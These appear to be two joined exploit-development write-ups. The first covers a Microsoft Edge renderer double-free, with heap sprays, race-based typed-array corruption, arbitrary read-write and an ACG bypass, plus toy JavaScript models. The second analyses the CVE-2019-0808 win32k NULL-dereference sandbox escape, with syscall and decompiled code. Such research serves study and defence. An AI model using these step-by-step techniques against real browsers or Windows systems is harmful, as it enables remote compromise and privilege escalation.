When the number of entries falls below a certain value, the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::Shrink() method is called to reduce the capacity of the hash table. During this call, key-value pairs are moved back to their previous positions.
When the canvas pattern object is freed, the hash table entry which holds the appropriate CCanvasPattern::Data object is removed via the following method call:
This method retrieves the hash table entry value by calling the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method.
If the call to CCanvasRenderingProcessor2D::EnsureBitmapRenderTarget() returns an error, the canvas pattern object has an uninitialized member which is supposed to hold a pointer to the CCanvasPattern::Data object. Nevertheless, the canvas pattern object destructor calls the CHtPvPvBaseT<&int nullCompare(…),HashTableEntry>::FindEntry() method and provides a key which is a nullptr. The method returns the very first value if there is any. If the hash table was grown and then shrunk, it will store pointers to the freed DXImageRenderTarget objects. Under such conditions, the TDispResourceCache<CDispNoLock,1,0>::Remove() method will operate on the already freed object (variable freedObject).
Several attempts are required to trigger the vulnerability because there will not always be an entry at the first position.
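The grow/shrink bookkeeping flaw and the null-key lookup combine into a dangling first entry. This can be modeled in a few lines of JavaScript; the class, probing scheme and sizes below are deliberately simplified stand-ins, not the real edgehtml implementation:

```javascript
// Toy model of the described flaw: rehashing clears keys but leaves the
// values behind, and a null-key lookup returns the first value present.
class LeakyCache {
  constructor() {
    this.capacity = 8;                                  // active region size
    this.slots = Array.from({ length: 64 }, () => ({ key: null, value: null }));
  }
  probe(key) {
    let i = key % this.capacity;
    while (this.slots[i].key !== null && this.slots[i].key !== key)
      i = (i + 1) % this.capacity;                      // linear probing
    return i;
  }
  add(key, value) {
    const i = this.probe(key);
    this.slots[i].key = key;
    this.slots[i].value = value;
  }
  rehash(newCapacity) {
    const live = this.slots.filter(s => s.key !== null)
                           .map(s => ({ key: s.key, value: s.value }));
    for (const s of this.slots) s.key = null;           // BUG: only the keys are
                                                        // cleared, values remain
    this.capacity = newCapacity;
    for (const s of live) this.add(s.key, s.value);     // pairs move to new indexes
  }
  remove(key) {
    const i = this.probe(key);
    this.slots[i].value.freed = true;                   // models the actual free()
    this.slots[i] = { key: null, value: null };         // only the new slot cleared
  }
  findEntry(key) {
    if (key === null)                                   // a null key degrades to
      return this.slots.find(s => s.value !== null)?.value ?? null;
    return this.slots[this.probe(key)].value;
  }
}

const cache = new LeakyCache();
for (let k = 9; k <= 14; k++)
  cache.add(k, { name: `DXImageRenderTarget#${k}`, freed: false });
cache.rehash(16);                               // grow: stale copies stay behind
for (let k = 9; k <= 14; k++) cache.remove(k);  // every render target is freed
const stale = cache.findEntry(null);            // null key, as with the
console.log(stale.freed);                       // uninitialized CCanvasPattern::Data
                                                // → true: a dangling value returned
```

Running this prints true: after a grow followed by removals, a lookup with a null key hands back a value whose backing object has already been freed, which is exactly the condition TDispResourceCache<CDispNoLock,1,0>::Remove() then operates on.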
It is possible to exploit this vulnerability in one of two ways:
allocate some object in place of the freed object and free it, thus causing a use-after-free on an almost arbitrary object
allocate some object which has a suitable layout (first quad-word must be a pointer to an object with a virtual function table) to call a virtual function and cause side-effects like corrupting some useful data
The first method was chosen for exploitation because it’s difficult to find an object which fits the requirements for the second method.
Exploit Development
The exploit turned out to be non-trivial due to the following reasons:
Microsoft Edge allocates objects with different sizes and types on different heaps; this reduces the amount of available objects
the freed object is allocated on the default Windows heap which employs LFH; this makes it impossible to create adjacent allocations and reduces the chances of successful object overwrite
the freed object is 0x10 bytes; objects of this size are often used for internal servicing purposes; this makes the relevant heap region busy which also reduces exploitation reliability
there is a limited number of LFH objects of 0x10 bytes in size that are available from Javascript and are actually useful
objects that are available for control from Javascript allow only limited control
no object used during exploitation allows direct corruption of any field in a way that can lead to useful effects (e.g. controllable write)
multiple small heap allocations and frees were required to gain control over objects with interesting fields.
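The reason same-size sprays are the only way to reclaim the freed slot can be illustrated with a toy model of an LFH size bucket. Real LFH internals are far more involved; the randomized hand-out below only captures the user-visible behavior the exploit has to contend with:

```javascript
// Toy model of a Low Fragmentation Heap size bucket. Allocations of a given
// size are served from that size's bucket in an order the attacker cannot
// predict, so landing on one specific freed slot requires a spray.
class LfhBucket {
  constructor(blockSize, count) {
    this.blockSize = blockSize;
    this.free = Array.from({ length: count }, (_, i) => i * blockSize);
  }
  alloc() {
    // Model the unpredictable free-block selection with a random pick.
    const i = Math.floor(Math.random() * this.free.length);
    return this.free.splice(i, 1)[0];
  }
  release(addr) { this.free.push(addr); }
}

const bucket16 = new LfhBucket(0x10, 64);
const victim = bucket16.alloc();      // the DXImageRenderTarget slot
bucket16.release(victim);             // freed via the hash-table bug

// A single allocation rarely lands on the victim slot; spray until one does.
let reclaimed = null;
while (reclaimed !== victim) reclaimed = bucket16.alloc();
console.log(reclaimed === victim);    // → true: the spray reclaimed the slot
```

Since the victim block stays on the free list until drawn, the spray is guaranteed to reclaim it eventually; the model also shows why a different-size allocation (served from a different bucket) could never take the slot.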
A high-level overview of the renderer exploitation process:
the heap is prepared and the objects required for exploitation are sprayed
all of the 0x10-byte DXImageRenderTarget objects are freed (one of them is the object which will be freed again)
audio buffer objects are sprayed; this also creates 0x10-byte raw data buffer objects with arbitrary size and contents; some of the buffers take the freed spots
the double-free is triggered and one of the 0x10-byte raw data buffer objects is freed (it is possible to read-write this object)
objects of 0x10-bytes size are sprayed, they contain two pointers (0x8-bytes) to 0x20-byte sized raw data buffer objects
the exploit iterates over the raw data buffer objects allocated on step 3 and searches for the overwrite
objects allocated on step 5 are freed (together with the 0x20-byte sized objects) and 0x20-byte sized typed arrays are sprayed over them
the exploit leaks pointers to two of the sprayed typed arrays
0x10-byte sized objects are sprayed, they contain two pointers to the 0x200-byte sized raw data buffer objects; audio source will keep writing to these buffers
the exploit leaks pointers to two of the sprayed write-buffer objects
the exploit starts playing audio; in a loop, it writes the address of the typed array (increased by 0x10 bytes to point at the length field of the typed array) into the controllable (vulnerable) object; the audio buffer source node keeps writing to the 0x200-byte data buffer and keeps re-writing the pointers to that buffer in the 0x10-byte object, so the repeated write in the loop is required to win a race
after a certain number of iterations the exploit quits looping and checks whether the length of the typed array has increased
at this point the exploit has achieved a relative read-write primitive
the exploit uses the relative read to find the WebCore::AudioBufferData and WTF::NeuteredTypedArray objects (they are placed adjacent on the heap)
the exploit uses data found during the previous step in order to construct a typed array which can be used for arbitrary read-write
the exploit creates a fake DataView object for more convenient memory access
once arbitrary read-write is achieved, the exploit launches a sandbox escape.
The following diagram can help understand the described steps:
Getting relative read-write primitive
To trigger the vulnerability, thirty canvas pattern objects are created; this forces the hash table to grow. Then the canvas pattern objects are freed and the hash table is shrunk; this creates a dangling pointer to the DXImageRenderTarget in the hash table entry. It is not yet possible to access the pointer to the freed object.
After the DXImageRenderTarget object is freed by the TDispResourceCache<CDispNoLock,1,0>::Remove() method, a spray is performed to allocate audio context data buffer objects – let us call it spray “A”. Data buffer objects are created by calling the audio context createBuffer() method. This function has the following prototype:
let buffer = baseAudioContext.createBuffer(numOfchannels, length, sampleRate);
The numOfchannels argument denotes the number of channel data pointers to create, length is the length of the data buffer, and sampleRate is not important for exploitation. The Javascript createBuffer() call triggers CDOMAudioContext::Var_createBuffer(), which eventually calls WebCore::AudioChannelData::Initialize():
On line 17 a WTF::IEOwnedTypedArray object is allocated on the default Windows heap. This object is interesting for exploitation as it contains the following metadata:
0:016> dq 000001b0`374fbd80 L20/8
000001b0`374fbd80 00007ffe`47f8b4a0 000001b0`379e9030 ; vtable; pointer to the data buffer
000001b0`374fbd90 00000000`00000030 00080000`00000000 ; length; unused
0:016> dq 000001b0`379e9030 L10/8
000001b0`379e9030 0000003a`cafebeef 00000000`00000002 ; arbitrary data
0:016> ln 00007ffe`47f8b4a0
(00007ffe`47f8b4a0) edgehtml!WTF::IEOwnedTypedArray<1,float>::`vftable`
On line 21 the data buffer is allocated (also on the default Windows heap). One of the buffers takes the spot of the freed DXImageRenderTarget object. This data buffer has the following layout:
The second quad-word is a reference counter. Values other than 1 trigger access to the virtual function table which does not exist and cause a crash. A reference counter value of 1 means that the object is going to be freed.
The data buffer which is allocated in place of the freed object is used throughout the exploit to read and write values placed inside this buffer.
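Since the channel data is exposed to Javascript as 32-bit floats, any 64-bit fields staged in such a buffer have to be written as raw bytes. The sketch below follows the 0x10-byte layout described above (second qword as the reference counter, which must be 1); the first qword’s value is just an illustrative marker:

```javascript
// Build the 0x10 bytes that overlay the freed object. The second qword is
// the reference counter; per the description above, any value other than 1
// would make the free path dereference a non-existent vtable and crash.
const bytes = new ArrayBuffer(0x10);
const qwords = new BigUint64Array(bytes);
qwords[0] = 0x0000003acafebeefn;   // arbitrary marker data (as in the dump)
qwords[1] = 1n;                    // reference counter: must be exactly 1

// The same 16 bytes viewed the way createBuffer()'s channel data exposes them.
const asFloats = new Float32Array(bytes);
console.log(asFloats.length);      // → 4: four floats encode the two qwords
```

Reading the same four floats back later and reassembling them into qwords is how changes made through the dangling pointer become visible to the exploit.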
Before freeing the object for the second time, audio context buffer sources are created by calling the Javascript createBufferSource() function. This function does not accept any arguments, but expects the buffer property to be set. Allocations are made before the vulnerable object is freed so as to avoid unnecessary noise on the heap – let us call it spray “B”. The buffer property is set to one of the buffer objects which were created during startup (i.e. before triggering the vulnerability) by calling createBuffer() – let us call it spray “C”. During this property access, the following method is called:
On line 71 yet another data buffer is allocated. The number of bytes depends on the number of channels: each channel contributes one pointer which points to data of arbitrary size and controllable contents. This is a useful primitive which is used later during the exploitation process.
To trigger the call to the WebCore::AudioBufferSourceNode::setBuffer() method, the audio must be already playing: either start() is called with the buffer property already set, or the buffer property is set and then start() is called.
Next, the double-free vulnerability is triggered and one of the audio channel data buffers is freed, although control from Javascript is retained.
The start() method of the audio buffer source object is called on each object of spray “B”. This creates multiple 0x10-byte sized objects with two pointers to the 0x20-byte sized data buffer object of spray “C”. During this spray one of the sprayed objects takes over the freed object from spray “A”.
Then the exploit iterates over spray “A” to find a data buffer with changed contents. Each object of spray “A” has getChannelData() – which returns the channel data as a Float32Array typed array. getChannelData() accepts only the channel number argument. Once the change has been found, a typed array is created. This typed array is read-writable and is further used multiple times in the exploit to leak and write pointers. Let us call it typed array “TA1”.
After the controllable channel data typed array is found, all of the spray “B” objects are freed. All data relevant to spray “B” is scoped to just one function; this is required to remove all internal references from Javascript to the data buffer from spray “C”. Otherwise it would not be possible to free the data buffer later.
After the return from the function, another spray is made – let us call it spray “D”. This spray prepares an audio buffer source data for the next steps and takes over the freed object. At this point the overwritten object does not contain data.
Then the exploit iterates over spray “D” and calls the start() function of each object. This writes two pointers pointing to the 0x200-byte sized objects into the freed object. These objects are used by the audio context to write audio data to be played. It is important to note that data is periodically written to this buffer, and pointers are constantly written to the 0x10-byte objects. (This poses another problem, which is resolved in the next step.) These pointers are also leaked via the “TA1” typed array.
Then the buffer object which was used for spray “B” is freed and a different spray is performed to take over the just-freed data buffer – let us call it spray “E”. Spray “E” allocates typed arrays (which are of size 0x20 bytes) and one of the typed arrays overwrites contents of the freed 0x20-byte data buffer. This allows a leak of pointers to two of the sprayed typed arrays via the typed array “TA1”. Only one pointer to the typed array is required for the exploit, let us call it typed array “TA2”. This typed array points to the data buffer of 0x30 bytes. The size of this buffer is important as it allows placement of other objects nearby which are useful for exploitation.
At this point it is known where the two typed arrays and the two audio write-buffers are located. The exploit enters a loop which constantly writes a pointer to the “TA2” typed array to the 0x10-byte object. The written pointer is increased by 0x10 bytes to point to the length field. The loop is required to win a race condition because the audio context thread keeps re-writing pointers in the 0x10-byte object. After a certain number of iterations the loop is ended and the exploit searches for the overwritten typed array.
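The need for the loop can be illustrated with a deterministic toy model of the race: one “thread” (the audio context) periodically restores the original pointer, the exploit loop keeps re-writing the corrupting pointer, and the consumer samples the slot on its own cadence. The cadences and pointer values below are invented; only the shape of the race is real.

```javascript
// Deterministic model of the pointer-overwrite race. Repeatedly writing the
// corrupting pointer guarantees that, sooner or later, the consumer samples
// the slot while our value is in it.
const AUDIO_PTR = 0x200n;          // pointer the audio thread keeps restoring
const EVIL_PTR  = 0x10n;           // models &TA2 + 0x10 (the length field)

let slot = AUDIO_PTR;
let won = false;

for (let tick = 1; tick <= 1000 && !won; tick++) {
  slot = EVIL_PTR;                          // exploit loop writes every tick
  if (tick % 3 === 0) slot = AUDIO_PTR;     // audio thread overwrites periodically
  if (tick % 7 === 0 && slot === EVIL_PTR)  // consumer dereferences the slot
    won = true;
}
console.log(won);                  // → true: repetition eventually wins the race
```

A single write would only win if the consumer happened to sample at exactly the right moment; the loop converts a low per-attempt probability into a near-certain outcome, which matches the exploit’s behavior of looping for a fixed number of iterations before checking the typed array length.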
The overwritten WTF::IEOwnedTypedArray typed array gives a relative read-write primitive.
Getting arbitrary read-write primitive
Before triggering the vulnerability, the exploit made another spray which allocated the buffer sources and the appropriate buffers for those sources – let us call it spray “F”. During this spray, WebCore::AudioBufferData objects of 0x30 bytes in size with the following memory layout are created:
These objects are placed nearby the data buffer which is controlled by the typed array “TA2”. WTF::NeuteredTypedArray objects of size 0x30 bytes are placed nearby too:
After the relative read-write primitive is gained, offsets from the beginning of the typed array “TA2” buffer to these objects are found by searching for the specific pattern.
Knowing the offset to the WebCore::AudioBufferData object makes it possible to leak a pointer to the audio channel data buffer. (The audio channel data is used to create a fake controllable DataView object and eventually achieve an arbitrary read-write primitive.) At offset 0x18 of the WebCore::AudioBufferData object, the pointer to the audio channel data buffer is stored. Before calling getChannelData(), the memory layout of the channel data buffer looks like the following:
After calling the getChannelData() member of the WebCore::AudioBufferData object, pointers in the channel data buffer are moved around and start pointing to typed array objects allocated on the Chakra heap. This is important, as it allows leaking the typed array pointers and creating a fake typed array. This is the memory layout of the channel data buffer after the call to getChannelData():
Knowing the offset to the WTF::NeuteredTypedArray object makes it possible to achieve an arbitrary read primitive.
The buffer this object points to cannot be used for writes: once a write happens, the buffer is moved to another heap. Increasing the length of the buffer is not possible either, because security asserts are enabled; an attempt to write to the buffer with a modified length crashes the renderer process.
The layout of the WTF::NeuteredTypedArray object looks like the following:
A pointer to the data buffer is stored at offset 8. It is possible to overwrite this pointer and point to any address to arbitrarily read memory.
With the arbitrary read primitive the contents of the typed array and the channel data buffer of the WebCore::AudioBufferData object are leaked. With the ability to write to the relative typed array, the following contents are placed in the controllable buffer:
After this operation the WebCore::AudioBufferData object points to the fake channel data (located at 0x00000140e87e7da0). The channel data contains a pointer to the fake DataView object (located at 0x00000140e87e7eb0). Initially, the Float32Array object is leaked and placed, but it is not a very convenient type to use for exploitation. To convert it to a DataView object, the type tag has to be changed in the metadata. The type tag for the Float32Array object type is 0x31, for the DataView object it is 0x38.
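The retyping step is just a one-byte write into the leaked metadata. In the sketch below the tag offset is an assumption made purely for illustration; the tag values 0x31 (Float32Array) and 0x38 (DataView) are the ones given above:

```javascript
// Fake object metadata staged in the controllable buffer. The real Chakra
// object layout is not reproduced here; TYPE_TAG_OFFSET is illustrative.
const TYPE_TAG_OFFSET  = 0x08;
const FLOAT32ARRAY_TAG = 0x31;   // type tag of a Float32Array (from the post)
const DATAVIEW_TAG     = 0x38;   // type tag of a DataView (from the post)

const fakeObject = new DataView(new ArrayBuffer(0x40));
fakeObject.setUint8(TYPE_TAG_OFFSET, FLOAT32ARRAY_TAG); // leaked as a Float32Array

// Retype the fake object: after this one-byte write the engine would treat
// it as a DataView, whose accessors are far more convenient for read-write.
fakeObject.setUint8(TYPE_TAG_OFFSET, DATAVIEW_TAG);
console.log(fakeObject.getUint8(TYPE_TAG_OFFSET).toString(16)); // → "38"
```

Everything else in the fake metadata (lengths, buffer pointers) is copied from the leaked real object, so flipping the tag is the only modification required.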
The fake DataView object is accessed by calling getChannelData() of the WebCore::AudioBufferData object.
At this point an arbitrary read-write primitive is achieved.
Wrapping up the renderer exploit
Getting code execution in the Microsoft Edge renderer is a bit more involved than in other browsers, since Edge employs mitigations known as Arbitrary Code Guard (ACG) and Code Integrity Guard (CIG). Nevertheless, there is a way to bypass ACG: with an arbitrary read-write primitive it is possible to find the stack address, set up a fake stack frame and divert code execution to a function of choice by overwriting the return address. This method was chosen to execute the sandbox escape payload.
The last problem that had to be addressed in order to have reliable process continuation is the LFH double-free mitigation. Once exploitation is over, some dangling pointers are left behind, and when they are picked up by the heap manager the process will crash. Some of these pointers can easily be found by leaking the addresses of the required objects; one last pointer had to be found by scanning the heap, as there was no straightforward way to locate it. Once the pointers are found, they are overwritten with null.
Open problems
The exploit has the following issues:
the vulnerability trigger depends on hardware;
exploit reliability is about 75%;
The first issue is due to the hardware error requirement described earlier. The trigger works only on VMware and on some devices with integrated video hardware. It may be possible to avoid the hardware dependency by triggering some generic video graphics error instead.
The second issue is mostly due to the complicated heap manipulations that are required and to the LFH mitigations. It is likely possible to improve reliability through smarter heap arrangement.
Process continuation was solved as described in the previous section; no artifacts remain.
Detection
It is possible to detect exploitation of the described vulnerability by searching for the combination of the following Javascript code:
repeated calls to createPattern()
setting canvas attributes “width” and “height” to large values
Overall, the renderer exploit achieves a ~75% success rate. Exploitation takes about 1-2 seconds on average; when multiple retries are required, it can take a bit longer.
Microsoft has gone to great lengths to harden the Edge renderer process, as browsers remain a major attack vector and the renderer presents the largest attack surface. Yet a single vulnerability was used to achieve memory disclosure and gain the arbitrary read-write needed to compromise a content process. Part 2 will discuss an interesting logical sandbox escape vulnerability.
Exodus 0day subscribers have had access to this exploit for use on penetration tests and/or implementing protections for their stakeholders.
This post explores a recently patched Win32k vulnerability (CVE-2019-0808) that was used in the wild with CVE-2019-5786 to provide a full Google Chrome sandbox escape chain.
Overview
On March 7th 2019, Google came out with a blog post discussing two vulnerabilities that were being chained together in the wild to remotely exploit Chrome users running Windows 7 x86: CVE-2019-5786, a bug in the Chrome renderer that has been detailed in our blog post, and CVE-2019-0808, a NULL pointer dereference bug in win32k.sys affecting Windows 7 and Windows Server 2008 which allowed attackers to escape the Chrome sandbox and execute arbitrary code as the SYSTEM user.
Since Google’s blog post, one crash PoC exploit for Windows 7 x86 has been posted to GitHub by ze0r, which results in a BSOD. This post details a working sandbox escape and a demonstration of the full exploit chain in action, utilizing these two bugs to illustrate the APT attack encountered by Google in the wild.
Analysis of the Public PoC
To provide appropriate context for the rest of this post, we will first start with an analysis of the public PoC code. The first operation conducted within the PoC code is the creation of two modeless drag-and-drop popup menus, hMenuRoot and hMenuSub. hMenuRoot will then be set up as the primary drop-down menu, and hMenuSub will be configured as its submenu.
Following this, a WH_CALLWNDPROC hook is installed on the current thread using SetWindowsHookEx(). This hook will ensure that WindowHookProc() is executed prior to a window procedure being executed. Once this is done, SetWinEventHook() is called to set an event hook to ensure that DisplayEventProc() is called when a popup menu is displayed.
The following diagram shows the window message call flow before and after setting the WH_CALLWNDPROC hook.
Window message call flow before and after setting the WH_CALLWNDPROC hook
Once the hooks have been installed, the hWndFakeMenu window will be created using CreateWindowA() with the class string “#32768”, which, according to MSDN, is the system reserved string for a menu class. Creating a window in this manner will cause CreateWindowA() to set many data fields within the window object to a value of 0 or NULL as CreateWindowA() does not know how to fill them in appropriately. One of these fields which is of importance to this exploit is the spMenu field, which will be set to NULL.
hWndMain is then created using CreateWindowA() with the window class wndClass. This will set hWndMain‘s window procedure to DefWindowProc() which is a function in the Windows API responsible for handling any window messages not handled by the window itself.
The parameters for CreateWindowA() also ensure that hWndMain is created in disabled mode so that it will not receive any keyboard or mouse input from the end user, but can still receive other window messages from other windows, the system, or the application itself. This is done as a preventative measure to ensure the user doesn’t accidentally interact with the window in an adverse manner, such as repositioning it to an unexpected location. Finally the last parameters for CreateWindowA() ensure that the window is positioned at (0x1, 0x1), and that the window is 0 pixels by 0 pixels big. This can be seen in the code below.
After the hWndMain window is created, TrackPopupMenuEx() is called to display hMenuRoot. This will result in a window message being placed on hWndMain‘s message stack, which will be retrieved in main()‘s message loop via GetMessageW(), translated via TranslateMessage(), and subsequently sent to hWndMain‘s window procedure via DispatchMessageW(). This will result in the window procedure hook being executed, which will call WindowHookProc().
As the bOnDraging variable is not yet set, the WindowHookProc() function will simply call CallNextHookEx() to call the next available hook. This will cause an EVENT_SYSTEM_MENUPOPUPSTART event to be sent as a result of the popup menu being created. This event message will be caught by the event hook and will cause execution to be diverted to the function DisplayEventProc().
Since this is the first time DisplayEventProc() is being executed, iMenuCreated will be 0, which will cause case 0 to be executed. This case will send the WM_LMOUSEBUTTON window message to hWndMain using SendMessageW() in order to select the hMenuRoot menu at point (0x5, 0x5). Once this message has been placed onto hWndMain‘s window message queue, iMenuCreated is incremented.
hWndMain then processes the WM_LMOUSEBUTTON message and selects hMenuRoot, which will result in hMenuSub being displayed. This will trigger a second EVENT_SYSTEM_MENUPOPUPSTART event, resulting in DisplayEventProc() being executed again. This time the second case is executed, as iMenuCreated is now 1. This case will use SendMessageW() to move the mouse to point (0x6, 0x6) on the user’s desktop. Since the left mouse button is still down, this will make it seem like a drag-and-drop operation is being performed. Following this, iMenuCreated is incremented once again and execution returns to the message loop inside main().
Since iMenuCreated now holds a value of 2, the code inside the if statement will be executed, which will set bOnDraging to TRUE to indicate the drag operation was conducted with the mouse, after which a call will be made to the function callNtUserMNDragOverSysCall() with the address of the POINT structure pt and the 0x100 byte long output buffer buf.
callNtUserMNDragOverSysCall() is a wrapper function which makes a syscall to NtUserMNDragOver() in win32k.sys using the syscall number 0x11ED, which is the syscall number for NtUserMNDragOver() on Windows 7 and Windows 7 SP1. Syscalls are used in favor of the PoC’s method of obtaining the address of NtUserMNDragOver() from user32.dll since syscall numbers tend to change only across OS versions and service packs (a notable exception being Windows 10 which undergoes more constant changes), whereas the offsets between the exported functions in user32.dll and the unexported NtUserMNDragOver() function can change anytime user32.dll is updated.
void callNtUserMNDragOverSysCall(LPVOID address1, LPVOID address2) {
    _asm {
        mov eax, 0x11ED
        push address2
        push address1
        mov edx, esp
        int 0x2E
        pop eax
        pop eax
    }
}
NtUserMNDragOver() will end up calling xxxMNFindWindowFromPoint(), which will execute xxxSendMessage() to issue a usermode callback of type WM_MN_FINDMENUWINDOWFROMPOINT. The value returned from the user mode callback is then checked using HMValidateHandle() to ensure it is a handle to a window object.
LONG_PTR __stdcall xxxMNFindWindowFromPoint(tagPOPUPMENU *pPopupMenu, UINT *pIndex, POINTS screenPt)
{
....
v6 = xxxSendMessage(
var_pPopupMenu->spwndNextPopup,
MN_FINDMENUWINDOWFROMPOINT,
(WPARAM)&pPopupMenu,
(unsigned __int16)screenPt.x | (*(unsigned int *)&screenPt >> 16 << 16)); // Make the
// MN_FINDMENUWINDOWFROMPOINT usermode callback
// using the address of pPopupMenu as the
// wParam argument.
ThreadUnlock1();
if ( IsMFMWFPWindow(v6) ) // Validate the handle returned from the user
// mode callback is a handle to a MFMWFP window.
v6 = (LONG_PTR)HMValidateHandleNoSecure((HANDLE)v6, TYPE_WINDOW); // Validate that the returned
// handle is a handle to
// a window object. Set v1 to
// TRUE if all is good.
...
When the callback is performed, the window procedure hook function, WindowHookProc(), will be executed before the intended window procedure is executed. This function will check to see what type of window message was received. If the incoming window message is a WM_MN_FINDMENUWINDOWFROMPOINT message, the following code will be executed.
This code will change the window procedure for hWndMain from DefWindowProc() to SubMenuProc(). It will also set bIsDefWndProc to FALSE to indicate that the window procedure for hWndMain is no longer DefWindowProc().
Once the hook exits, hWndMain‘s window procedure is executed. However, since the window procedure for the hWndMain window was changed to SubMenuProc(), SubMenuProc() is executed instead of the expected DefWindowProc() function.
SubMenuProc() will first check if the incoming message is of type WM_MN_FINDMENUWINDOWFROMPOINT. If it is, SubMenuProc() will call SetWindowLongPtr() to set the window procedure for hWndMain back to DefWindowProc() so that hWndMain can handle any additional incoming window messages; this prevents the application from becoming unresponsive. SubMenuProc() will then return hWndFakeMenu, the handle to the window that was created using the menu class string.
Since hWndFakeMenu is a valid window handle, it will pass the HMValidateHandle() check. However, as mentioned previously, many of the window’s elements will be set to 0 or NULL, as CreateWindowEx() tried to create a window as a menu without sufficient information. Execution will subsequently proceed from xxxMNFindWindowFromPoint() to xxxMNUpdateDraggingInfo(), which will perform a call to MNGetpItem(), which will in turn call MNGetpItemFromIndex().
MNGetpItemFromIndex() will then try to access offsets within hWndFakeMenu‘s spMenu field. However since hWndFakeMenu‘s spMenu field is set to NULL, this will result in a NULL pointer dereference, and a kernel crash if the NULL page has not been allocated.
tagITEM *__stdcall MNGetpItemFromIndex(tagMENU *spMenu, UINT pPopupMenu)
{
    tagITEM *result; // eax
    if ( pPopupMenu == -1 || pPopupMenu >= spMenu->cItems ) // NULL pointer dereference will occur
                                                            // here if spMenu is NULL.
        result = 0;
    else
        result = (tagITEM *)spMenu->rgItems + 0x6C * pPopupMenu;
    return result;
}
Sandbox Limitations
To better understand how to escape Chrome’s sandbox, it is important to understand how it operates. Most of the important details of the Chrome sandbox are explained on Google’s Sandbox page. Reading this page reveals several important details about the Chrome sandbox which are relevant to this exploit. These are listed below:
All processes in the Chrome sandbox run at Low Integrity.
A restrictive job object is applied to the process token of all the processes running in the Chrome sandbox. This prevents the spawning of child processes, amongst other things.
Processes running in the Chrome sandbox run in an isolated desktop, separate from the main desktop and the service desktop to prevent Shatter attacks that could result in privilege escalation.
On Windows 8 and higher the Chrome sandbox prevents calls to win32k.sys.
The first protection in this list is that processes running inside the sandbox run with Low integrity. Running at Low integrity prevents attackers from being able to exploit a number of kernel leaks mentioned on sam-b’s kernel leak page, as starting with Windows 8.1, most of these leaks require that the process be running with Medium integrity or higher. This limitation is bypassed in the exploit by abusing a well known memory leak in the implementation of HMValidateHandle() on Windows versions prior to Windows 10 RS4, and is discussed in more detail later in the blog.
The next limitation is the restricted job object and token that are placed on the sandboxed process. The restricted token ensures that the sandboxed process runs without any permissions, whilst the job object ensures that the sandboxed process cannot spawn any child processes. The combination of these two mitigations means that to escape the sandbox the attacker will likely have to create their own process token or steal another process token, and then subsequently disassociate the job object from that token. Given the permissions this requires, this most likely will require a kernel level vulnerability. These two mitigations are the most relevant to the exploit; their bypasses are discussed in more detail later on in this blog.
The job object additionally ensures that the sandboxed process uses what Google calls the “alternate desktop” (known in Windows terminology as the “limited desktop”), which is a desktop separate from the main user desktop and the service desktop, to prevent potential privilege escalations via window messages. This is done because Windows prevents window messages from being sent between desktops, which restricts the attacker to only sending window messages to windows that are created within the sandbox itself. Thankfully this particular exploit only requires interaction with windows created within the sandbox, so this mitigation only really has the effect of making it so that the end user can’t see any of the windows and menus the exploit creates.
Finally it’s worth noting that whilst protections were introduced in Windows 8 to allow Chrome to prevent sandboxed applications from making syscalls to win32k.sys, these controls were not backported to Windows 7. As a result Chrome’s sandbox does not have the ability to prevent calls to win32k.sys on Windows 7 and prior, which means that attackers can abuse vulnerabilities within win32k.sys to escape the Chrome sandbox on these versions of Windows.
Sandbox Exploit Explanation
Creating a DLL for the Chrome Sandbox
As is explained in James Forshaw’s In-Console-Able blog post, it is not possible to inject just any DLL into the Chrome sandbox. Due to sandbox limitations, the DLL has to be created in such a way that it does not load any other libraries or manifest files.
To achieve this, the Visual Studio project for the PoC exploit was first adjusted so that the project type would be set to a DLL instead of an EXE. After this, the C++ compiler settings were changed to tell it to use the multi-threaded runtime library (not a multithreaded DLL). Finally the linker settings were changed to instruct Visual Studio not to generate manifest files.
Once this was done, Visual Studio was able to produce DLLs that could be loaded into the Chrome sandbox via a vulnerability such as István Kurucsai’s 1Day Chrome vulnerability, CVE-2019-5786 (which was detailed in a previous blog post), or via DLL injection with a program such as this one.
Explanation of the Existing Limited Write Primitive
Before diving into the details of how the exploit was converted into a sandbox escape, it is important to understand the limited write primitive that this exploit grants an attacker should they successfully set up the NULL page, as this provides the basis for the discussion that occurs throughout the following sections.
Once the vulnerability has been triggered, xxxMNUpdateDraggingInfo() will be called in win32k.sys. If the NULL page has been set up correctly, then xxxMNUpdateDraggingInfo() will call xxxMNSetGapState(), whose code is shown below:
void __stdcall xxxMNSetGapState(ULONG_PTR uHitArea, UINT uIndex, UINT uFlags, BOOL fSet)
{
...
var_PITEM = MNGetpItem(var_POPUPMENU, uIndex); // Get the address where the first write
// operation should occur, minus an
// offset of 0x4.
temp_var_PITEM = var_PITEM;
if ( var_PITEM )
{
...
var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the
// address where the second write operation
// should occur, minus an offset of 0x4. This
// address will be 0x6C bytes earlier in
// memory than the address in var_PITEM.
if ( fSet )
{
*((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the
// attacker controlled address.
if ( var_PITEM_Minus_Offset_Of_0x6C )
{
*((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u;
// Conduct the second write to the attacker
// controlled address minus 0x68 (0x6C-0x4).
...
xxxMNSetGapState() performs two write operations to an attacker controlled location plus an offset of 4. The only difference between the two write operations is that 0x40000000 is written to an address located 0x6C bytes earlier than the address where the 0x80000000 write is conducted.
It is also important to note that the writes are conducted using OR operations. This means that the attacker can only add bits to the DWORD they choose to write to; it is not possible to remove or alter bits that are already set. Furthermore, even if an attacker offsets the start of their write, the best they can achieve is placing a single \x40 or \x80 byte at a chosen address.
From these observations it becomes apparent that the attacker will require a more powerful write primitive if they wish to escape the Chrome sandbox. To meet this requirement, Exodus Intelligence’s exploit utilizes the limited write primitive to create a more powerful write primitive by abusing tagWND objects. The details of how this is done, along with the steps required to escape the sandbox, are explained in more detail in the following sections.
Allocating the NULL Page
On Windows versions prior to Windows 8, it is possible to allocate memory in the NULL page from userland by calling NtAllocateVirtualMemory(). Within the PoC code, the main() function was adjusted to obtain the address of NtAllocateVirtualMemory() from ntdll.dll and save it into the variable pfnNtAllocateVirtualMemory.
Once this is done, allocateNullPage() is called to allocate the NULL page itself, using address 0x1, with read, write, and execute permissions. The address 0x1 will then be rounded down to 0x0 by NtAllocateVirtualMemory() to fit on a page boundary, thereby allowing the attacker to allocate memory at 0x0.
